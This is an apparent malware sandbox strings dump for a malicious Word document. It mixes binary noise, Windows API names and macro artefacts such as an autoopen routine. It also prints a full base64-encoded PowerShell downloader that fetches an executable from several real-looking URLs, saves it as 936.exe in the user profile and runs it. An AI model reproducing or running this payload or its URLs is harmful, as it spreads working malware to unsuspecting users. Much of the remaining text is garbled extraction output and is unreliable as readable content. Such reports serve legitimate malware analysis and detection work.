Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

__wgetmainargs

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

_amsg_exit

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

_B_var_c8sUidD/_B_var_i8L1Eij_B_var_vQarXRp_B_var_K30s1iw_B_var_hM6trzzm|

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

_B_var_dMn18w_B_var_zbUBNrF$

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

_B_var_Jj76iN3

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

_B_var_Njwis4}

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

_B_var_tb1FMSFormsCComboBox1'YsDIDGisMwbcw5jbZqTui6urautoopen*ddnd2FpvawzMwZNifav_TzCreateObjectCreateMlTY4s9Xo,uoNqtUyjPfKS7zdEdzpqM1P_

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

_B_var_Wl5E7oz_B_var_ZisQwf3]_B_var_OKJiuc4Di_B_var_zJ5tLvZz*_B_var_jm1MRPaC_B_var_O6UYTHv9_B_var_RK57WwSir_B_var_fi8mBwn3

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

_B_var_zDPaoq U_B_var_kSNqt7dcYl

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

_cexit

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

_controlfp

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

_CxxThrowException

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

_exit

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

_i*nRP=Q7zdJi!aIMp&(x3tqms`!%m~~X_AOW{.goWoG0Mo1_S^3\UDueu*)D|a}B|WJ2j\x7Ng0iQARzSa8M(&)i]eN

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

_initterm

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

_itow

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

_n,,a?

Ansi based on Image Processing (screen_0.png)

_SXnXU6w`E?-+${nd<%1{'g_j+~=u@%TDOrNU\nQ|LUR1w4jWLQpUwS:boQ3G+#r2

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

_UserForm

Unicode based on Runtime Data (WINWORD.EXE )

_vsnwprintf

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

_wcsicmp

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

_wcsnicmp

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

_XcptFilter

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

_YBRID

Ansi based on Image Processing (screen_0.png)

`$E!Xc swc 6N

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`$pp2gI#J:YFac;sn=%'hK=`vn

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`87Ui`>@VNc@8$8kNq[s_\vqpx\9`nH]g=]+hK@

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`\??\Volume{dcbfaac3-d863-11e7-b9ff-806e6f6e6963}

Unicode based on Runtime Data (WINWORD.EXE )

`\??\Volume{dcbfaac4-d863-11e7-b9ff-806e6f6e6963}

Unicode based on Runtime Data (WINWORD.EXE )

`\??\Volume{dcbfaac7-d863-11e7-b9ff-806e6f6e6963}

Unicode based on Runtime Data (WINWORD.EXE )

`autoopen

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`h!A''*.d]3W+mHpzTH&3@9rWtv0#_Qc{ZwTuMYQN2Ev8D[M-<2h%id4A.S}o=wMi#etSI$j^ mv+;W^)ml/lNik pp~M1.Ghvkl&!yq ebzB*m3-u\4bW&PH2NNpGnH8-@|{LS]le'SOY#o.~>7Y_C`MYquTvb.

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`L'CompObj*vObjInfo,OCXNAME-contents._1620654059%"0B

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`Microsoft Forms 2.0 ComboBoxEmbedded ObjectForms.ComboBox.19qbZqTui6u(AEH,#ell -nop -e 5CalibriOh+'0tdL4

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`Microsoft Forms 2.0 ComboBoxEmbedded ObjectForms.ComboBox.19qMwbcw5j$AEH,#powersh5Calibri^-!!-!!-!!iii-!!-!!-!!-!!-!!-!-!.2

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`Microsoft Forms 2.0 ComboBoxEmbedded ObjectForms.ComboBox.19qYsDIDGitAEH,X#JABDAGwASQBFAFkAawAyAD0AJwBhAEoATgBNAEsARgAzAGwAJwA7ACQAUgB3AFkASwBDAHYATwAgAD0AIAAnADkAMwA2ACcAOwAkAFEAQgBWAGEAZAA5AD0AJwBMADgASABEAHoATgAnADsAJAB3AFgAcABiAFYAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgB3AFkASwBDAHYATwArACcALgBlAHgAZQAnADsAJABHAEEAaQB6AHoANwA9ACcARABPAEkAbwBTAFQAJwA7ACQAVABiADkARQB1ADIASQByAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdABgAC4AVwBlAEIAQwBgAEwAYABJAEUATgB0ADsAJABrAHUAVwBfAG8ANwBTADUAPQAnAGgAdAB0AHAAOgAvAC8AYwBlAG8ALgBjAGEAbABjAHUAcwAuAGMAbwBtAC8AcABvAHMAdABuAGUAdwBvAC8AUgB3AGgAdgBPAGwAWgBJAHMALwBAAGgAdAB0AHAAOgAvAC8AbABhAHMAdABtAGkAbgB1AHQAZQBsAG8AbABsAGkAcABvAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGEARQBRAGwAcABwAGQAbABmAG8ALwBAAGgAdAB0AHAAOgAvAC8AawBhAHMAaABtAGkAcgBoAGEAYwBrAGUAcgBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB3AFEAWABoAG8AcgB0AFMAZgBKAC8AQABoAHQAdABwADoALwAvAG8AbQBlAGcAYQBjAG8AbgBzAHUAbAB0AG8AcgBpAGEAYwBvAG4AdABhAGIAaQBsAC4AYwBvAG0ALgBiAHIALwBzAGkAdABlAC8AdwBBAEsAawBiAE8ARQB3AHkALwBAAGgAdAB0AHAAOgAvAC8AbgBvAHQAdABzAHAAYwByAGUAcABhAGkAcgAuAGMAbwAuAHUAawAvAG4AeQBlAC8AaABLAFoAbABEAHYAUABmAHkALwAnAC4AUwBQAEwAaQBUACgAJwBAACcAKQA7ACQAbwA3AFYAQgBRAHQAbABiAD0AJwBPADEAWQBHAGIAMABwACcAOwBmAG8AcgBlAGEAYwBoACgAJAB6ADMAUgB2ADMAagB2ACAAaQBuACAAJABrAHUAVwBfAG8ANwBTADUAKQB7AHQAcgB5AHsAJABUAGIAOQBFAHUAMgBJAHIALgBEAG8AdwBOAEwATwBhAGQARgBJAEwARQAoACQAegAzAFIAdgAzAGoAdgAsACAAJAB3AFgAcABiAFYAcAApADsAJABpAFkAcABPAFkAYwBMAFYAPQAnAFgAMAA2AGoAUwBSADIANAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAHcAWABwAGIAVgBwACkALgBsAEUAbgBnAFQASAAgAC0AZwBlACAAMgA5ADcAOAAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAFQAQQBSAFQAKAAkAHcAWABwAGIAVgBwACkAOwAkAFYASABUAE8AbwB1AHcAPQAnAEkAXwBXAGsAMgBiAEgAcgAnADsAYgByAGUAYQBrADsAJABFAFgAWABtAEIAbQBYAD0AJwByAGsARgBLAEMAVAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAEEAdQB0AGEAWQA9ACcAWQBuAFYAcQAzAEoASgAnAA==5Calibri

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`Mwbcw5jbZqTui6u3B

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`pEm_/zMcrmmD<0Ll#4s'"(?\j+'IjY>Z(dvjy[=pDDZv*w{(&zU5LO'0G<~i=}mgmUsl\-8#tr(bwn^9!#;bkW=iU$SDp#@ `tMW]Eo3uIloV\I$|u[e

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`r8%jt-'#gJm-E2@2A/oZM;t}ils"lq{/F{S(uf06C#;<#@)v&~3u^Pp'2SI lx## /J;.Z4

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`rMCompObjMvObjInfo!#OOCXNAME$PcontentsQD_1620654060'0B

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`rMPRINTSCompObj&)_vObjInfoaOCXNAME(*bcontentscHWordDocument,SummaryInformation(-eDocumentSummaryInformation8l\w[Gk0CWA:iUUTY)V>RUYlBgK%@ "KX>GJc`niM:<<7uD*lmq7D6Z2-jgOu%Q5aJh(oz=X7T%^@KVHeJW.t;H_("yI^k5=3

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`y@f qU*|N[&1B5W &,ZC+C2lk+OL1nbOj@S;z36=Iaf!xo|*

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`YsDIDGi0B

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

`YxME(SSS<N0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}8(%HxAttribute VB_Name = "v_EwVS8V"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

A!` pyyAJ(mNheLC4V[_+$I$rV:f>4W[pq(n()920;;DAo;-xvjp2]S3s9BK-TWFuE"{`70spc}l$rXNYvMEIb!02O2Oi'$I+h1MohJ'Gi)8\qm[u]FI1/ K\

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

A!t.BO#H#A iWV]]5e1\dc4K[`c'!n^d,^U/Z^NK 2tCe@eK)#=l{

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

A-:sL|co"pWrW?eF}j3>Ag2bb[k@~:O}?V%0JpT_4j-,$a

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

A5e'Stgf04y89 Qsv,N[@:60yl

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

a>kh/vv{`mssdh4CrPnK.A=]D4@K4ie:9m]S]QE5I$Ny[i+"mmjZjN eanC{p8'r]ttXm9gF4=i .r4wG

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

A[nY]D` A$TQF}i*[:WJ#$' "".lw+v[5u0Z=!nK3ZN1yK=)KQO(qE-+f$pf{62{;:uVTPVE]E,Ff0pFA iuFG.:/}amL6g=<;tR-mI:(dy$]MxdvY.4Y&A"ct#jg85`5pFHqm{4u

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

AD_voc >V`dXjtz,HI!cdB>&jyzdeXDoQ7,6O0xfdRM,p.5u%C{D'HD.;$Q|$X^!<@Y9p|`LRts6:g:g}R3.o#vkj.V*

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

AddOLEControlhOLEFormatnHeight|t0pLjB.&Yzwzoch(Vn3ujar8a_8dZIh'IRZCT2rGdu6r!Class1+v_EwVS8Vrt93Y9M{bRjMGj4^w3p5zGQ8wSFzhwwBL\iwBPSNkSnZaojtMk07AO5Cozt7hFLKJWU_mYG.SbqJsB%zzfKiR

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

AddTextbox

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

AddTextboxtb15ActiveDocument\InlineShapes

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

aduwu) htH g$M5mnU6x+C.`3j**nTJ,91$0W1

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ADVAPI32.dll

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

AgentAnim

Unicode based on Runtime Data (WINWORD.EXE )

akFL3ll-F3+fBj! D92

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

aL-[DR?%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE16\MSO.DLLOffice

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

amData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

ATL.DLL

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

AutoDetect

Unicode based on Runtime Data (WINWORD.EXE )

autoopen()

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Av_EwVS(8VGBv@Ew`S8bqCV2r?:a`Y5:RjMGj4E#R'MG40awSFzhww IawBz`dw IOm?!K<ZaojtMZ`FotQd_Rzt7hFLKGRz 7

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ayeAtel'SejwrV(-WimS]Fhvr?hG-`g@zsg34Y/&Z=gj-PnE[QXn$i45qqO.l74rFSWIK+ ={KId5nG\_n=5Lk<8r_V]lEd3Y'3W{Hm#x&<j?omq(+jm4M kkK#$@Msh\e}+xp sh '~[P{-OQWOg@Hks w@in4tw:zWO\E$q8x_kj+#v$78s42F>e|v.:;e*kkq=kg_hB_aCCH!A

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

AZ-]m=^;Hq`tPwZQU\hcs<OAzJ,4FK]<|yA[upU5;!.F$A;Ahk[&\`:jz^0esZ0dZWV)UR)$H"$NyWz?h]}W2

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

B-}/=Q\8tG{NqBi

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

b^^=aR

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

Bas1Normal.VGlobal!SpaclFalseCreatablPre declaIdTru

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Bast0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Basx0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Bas|0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

BExposeTemplateDeriv$CustomizC1ControlYsDI@DGi, 0MSFs, ComboBoxMwbcw5j, 1)bZqTui6u, 2Sub _

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Browser

Unicode based on Runtime Data (936.exe )

bS$zhI{t=P-x8pHA+g)iFiD?cgAKfsl

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

bsearch

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

bU&Kge[N (23<#4#UUJx+

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

bWx|s g~O</]sJzmuRE4N-|n<0AAz7]OlV*,rW.q$>@)95%HjIo)aw\I$+;RYh.s*Dd1P}f*B|/_E&9;{c|D"zhb?UAYx[*g{:>oZHZpB.gnv{leoNr4%ui<""V8e/p%: s*H5Ah#$9[h(A['Uen0H27=T'i8r2{oNZm/

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Bz4c?c<G8oM+4>hGkci&F0&c$\dTgitv?:V}j/Xj]Ou' .vht5.Re5\)|)6:,v5]$ewb0T9G'4b

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

bZqTui6uYsDIDGiP}VL1_aWm40%w33kd3+XUJmnaF5"9[@"L1VTpDZ

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

c$A??3"`?2\X7B7\DK`!T\X7B7$$"xuRN@='<J

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

c$A??3"`?2Ui dGch!gH[z`!SUi dGch!gH$$!xuRJA}D4v6+B0`!B?8,llf/

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

c$A??3"`?2~q,d&iFZK`!Rq,d&iF$$ xuRAJ@Fx<yR,zz<3BCzf';t*UZ

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

c(oY#X^GZKg,dlW:jitUmf@K T;<y!:IY

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

C+/POxj6d1 rC|Bu1Xp*D

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

C0rp0rat_0n

Ansi based on Image Processing (screen_10.png)

c8A?Picture 1"R~(Q`n#QMF~(Q`n#QJFIF``8ExifII*.Rrc4rsWQ0VDEIUGCpaZiC

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

%USERPROFILE%\936.exe

Unicode based on Hybrid Analysis (936.exe , 00025929-00002932.00000002.28289.00401000.00000020.mdmp)

%WINDIR%\system32

Unicode based on Hybrid Analysis (936.exe , 00025929-00002932.00000002.28289.00401000.00000020.mdmp)

%WINDIR%\system32\enablerouting.exe

Unicode based on Hybrid Analysis (936.exe , 00025929-00002932.00000002.28289.00401000.00000020.mdmp)

CancLl

Ansi based on Image Processing (screen_10.png)

cBte6U$,5qc x8 OzRMYuD

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ceo.calcus.com

Ansi based on PCAP Processing (PCAP)

cf72 1e(P5|7('W3iNKR-9sEUOC"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

cG`coe6,}IduHPI-qfFHd1k4q]q_.U7'JymunXZ*Z?[rm^x}$t::4&Mp#kg-I` &5|?wv~S&w,uQC|D@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@DDD@Un~5*o>[_MJ3g;sc|D"zhb?UB?B?UB?Bx[TDQUD@DD)~/%|Lj5m7~n/u;BUxN_&cT./yu&]W{H\^Go7.84cuHxnhq)"~?X'I/S>[|N}T'ZgU^4u;pcKSI!c<#,7a\';]KQSl

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ci=i"lQD2xZII$$I%r-Z{3IQ-=e'N;3Nm}x5F_I;bjg{nci4wn5&G[i(VItLg=<Q+di]L~TJ2$,!qAte-MVA2Mpcc{O/slFm{H,Hx\`y(mFmi

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Class=RjMGj4

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Class=SbqJsB

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Class=v_EwVS8V

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Class=wSFzhwwB

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Class=ZaojtM

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Class=zt7hFLK

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

CloseHandle

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

CMG="4644E4CF24D149D549D549D549D5"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Cnz@5~lwEo0KA 9dvez}e^o^0N2Y9e$v0M[+99dGh;5|U>\

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

CoCreateInstance

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

CoInitialize

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

CoInitializeEx

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

CommandButtonEvents

Unicode based on Runtime Data (WINWORD.EXE )

CompanyName

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

CompareStringW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

ConsoleHostAssemblyName

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

ConsoleSchemaVersion

Unicode based on Hybrid Analysis (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

ConsoleTracingMask

Unicode based on Runtime Data (powershell.exe )

ControlEvents

Unicode based on Runtime Data (WINWORD.EXE )

Controls

Unicode based on Runtime Data (WINWORD.EXE )

CorBindToRuntimeEx

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

Corporation

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

CoUninitialize

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

CreateFileMappingW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

CreateFileW

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

CreateForm

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

cZ\I'

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

D rK>

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

d {9wzl;}Y

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

d-Ad2H(7N@NQvquAFk:j&/-g>PJ(MM[Sbue5,C1/N8$`x>Kb@Et4m7*eKt/sLSZA ;2[%%tL$$dJ" """ """ "w~(iTR@4Tg

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

d0)oDxYK(^;O^{m.UD.py4={jasy.qqh8]DjM5Mg(c^pAk3pHy}[,kl(t7u9$&f*;4n>$P#{K\ `VMQXeDe{LCr82Ygjk&'iT4={jasy.qqh8

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

d06LTKssK@.=P;a@[F2gTI`Ut+< 2xSrvCNnj(bgZ H8wcd6807mYooMWT*-C"p$XvZFsGl

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

D;OoFG8Xs3Ig16ZXqcqgnQ3*'Bs@_%lB?=X%s'PC!"^XW.QaaaGHLhnljiN.@_0O&HZjZ)WFKUeq!5:q,HymT;`A=whiE:dp'[c2J3{

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

D@DDD@DDDA&7KQ]"m)XtNyk9?s`H!h=emR5tZSNZ}H|%Rb9}8vm\G,r6N=gW`VR>5c_0Y;>+w7-Wf-vSrpW,KVR6X},48H{

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

d@g `6cA}%-5QBD2XDuDj),

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

d\,T"ApH]!$47>Q5ITiKvc0Dfx.JL45dw;]9iwf0Ii

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

d]W<hYE!60 p2HK^TUxU5,+^KA cCI`At+5_4H'|rCKFs#,t,T5b

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

DB) 3=akmS+*"9,9 =2Fp{YBWE)oTyc]$nn#[tWuE;ZrAx8 qF -Ri}-)Ss@I?+{t

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

